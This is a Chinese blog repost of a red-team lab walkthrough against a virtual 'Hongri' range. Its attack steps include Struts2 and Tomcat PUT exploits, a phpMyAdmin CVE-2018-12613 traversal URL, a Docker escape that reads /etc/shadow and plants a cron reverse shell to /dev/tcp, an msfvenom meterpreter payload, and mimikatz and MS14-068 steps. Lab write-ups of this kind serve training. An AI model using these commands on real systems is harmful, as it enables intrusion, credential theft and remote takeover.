ATT&CK实战系列-红队实战(四)

admin 2025年5月8日17:08:39评论1 views字数 2449阅读8分9秒阅读模式
红日靶场四(非完整)
网络配置
网卡
添加仅主机网卡vmnet2,192.168.183.0/24DHCP:192.168.183.128—192.168.183.255
服务器
攻击机IP
ATT&CK实战系列-红队实战(四)
DC(域控)
账号密码administrator:Test2008IP地址192.168.183.128
ATT&CK实战系列-红队实战(四)
WEB(双网卡)
账号密码ubuntu:ubuntuIP地址192.168.183.129192.168.0.106
ATT&CK实战系列-红队实战(四)
WIN7
账号密码douser:Dotest123IP地址192.168.183.130
ATT&CK实战系列-红队实战(四)
信息收集
端口扫描
获取服务器开启22、2001、2002、2003端口
ATT&CK实战系列-红队实战(四)
访问端口
2001:文件上传页面2002:Tomcat默认页面2003:phpmyadmin页面
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
漏洞查找
太菜了,直接上扫描器,扫一下2001出现Struts2漏洞2002出现Tomcat文件上传漏洞2003未扫描到漏洞
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
漏洞利用
Struts2
Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 id)的属性值进行二次表达式解析,因此在某些场景下将可能导致远程代码执行。
特征:1、查看HTTP响应头中是否包含X-Struts-Version字段2、检查URL中是否包含.action或.do后缀3、查看错误页面是否包含"Struts Problem Report"等字样4、检查是否存在/struts/webconsole.html路径
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
反弹shell、监听端口、上线
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
Tomcat漏洞
默认页面暴漏的版本是8.5.19可能造成影响的漏洞:CVE-2017-12615、CVE-2017-12617、CVE-2017-5664
将请求改为PUT
ATT&CK实战系列-红队实战(四)
访问文件成功
ATT&CK实战系列-红队实战(四)
生成哥斯拉木马
ATT&CK实战系列-红队实战(四)
上传木马
ATT&CK实战系列-红队实战(四)
访问木马
ATT&CK实战系列-红队实战(四)
连接成功
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
PhpMyAdmin(4.8.1)
phpmyadmin获取shell方法1、SQL命令执行获取webshell(要有文件写入权限、知道网站绝对路径、目录可写)2、日志文件写入webshell3、CVE-2018-126134、CVE-2018-19968
修改日志没有权限
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
CVE-2018-12613
CVE-2018-12613 是 PHPMyAdmin 4.8.0 到 4.8.3 版本中存在的一个高危漏洞,允许攻击者通过精心构造的请求读取服务器上的任意文件。漏洞存在于index.php文件中对target参数的处理过程中,由于对包含文件路径的验证不足,导致攻击者可以通过目录遍历读取服务器上的敏感文件。
查看etc/passwdhttp://192.168.0.105:2003/index.php?target=db_structure.php%253f/../../../../../../../../etc/passwd
ATT&CK实战系列-红队实战(四)
写入phpinfo
ATT&CK实战系列-红队实战(四)
当前页面cookie中的phpmyadmin的值
ATT&CK实战系列-红队实战(四)
http://192.168.0.105:2003/index.php?target=db_structure.php%253f/../../../../../../../../tmp/sess_cookie
ATT&CK实战系列-红队实战(四)
获取到路径
ATT&CK实战系列-红队实战(四)
写入木马
ATT&CK实战系列-红队实战(四)
访问
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
连接成功
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
Docker
判断Docker环境
ls -alh /.dockerenv  #判断根目录是否存在.dockerenv文件cat /proc/1/cgroup   #检查/proc/1/cgroup是否含有docker字符串
ATT&CK实战系列-红队实战(四)
Docker逃逸(1)
fdisk -l #查看可挂载的磁盘mkdir /test  #创建一个目录mount /dve/sda1 /test #将磁盘挂载到创建的目录cd /test  #切换到创建的目录ls   #查看cat /etc/shadow #查看etc/passwd将shadow导出,使用john破解,使用ssh登录
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
ATT&CK实战系列-红队实战(四)
Docker逃逸(2)
fdisk -l #查看可挂载的磁盘mkdir /test  #创建一个目录mount /dve/sda1 /test #将磁盘挂载到创建的目录
写入计划任务touch /test/test.shecho "bash -i >& /dev/tcp/IP/端口 0>&1" >/test/test.shecho "* * * * * root bash /test.sh" >> /test/etc/crontab
监听端口,等待shellnc -lvvp 9898
内网
查看内网机器IP
ATT&CK实战系列-红队实战(四)
上传fscan
ATT&CK实战系列-红队实战(四)
扫描
ATT&CK实战系列-红队实战(四)
上线MSF
生成木马msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > XXX.elf
ATT&CK实战系列-红队实战(四)
将木马下载至目标机器,运行木马
ATT&CK实战系列-红队实战(四)
同时msf进行监听
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost xx.xx.xxset lport 端口run
ATT&CK实战系列-红队实战(四)
添加路由
ATT&CK实战系列-红队实战(四)
根据fscan扫描结果,永恒之蓝攻击
ATT&CK实战系列-红队实战(四)
后面攻击了很多遍都不成功,两台都试了,暂时没找到原因。。。
ATT&CK实战系列-红队实战(四)
若打下非域控机器后,可进行内网信息收集
在非域控的主机WIN7上有我们需要的工具,如mimikatz.exe,MS14-068.exe 等。
mimikatz.exesekurlsa::logonpasswords   #导出密码获取域成员SID
使用MS14-068提权
漏洞简介:MS14-068 是 Microsoft Windows 中 Kerberos 实现的一个严重漏洞,影响所有 Windows 域控服务器受影响系统:Windows Server 2003 SP2Windows Server 2008 SP2/R2 SP1Windows Server 2012/R2Windows 7/8/8.1基本利用步骤:1获取普通域用户凭证2使用工具生成伪造的TGT票证3将伪造票证注入当前会话4获取域管理员权限

原文始发于微信公众号(破晓信安):ATT&CK实战系列-红队实战(四)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月8日17:08:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK实战系列-红队实战(四)https://cn-sec.com/archives/4041542.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息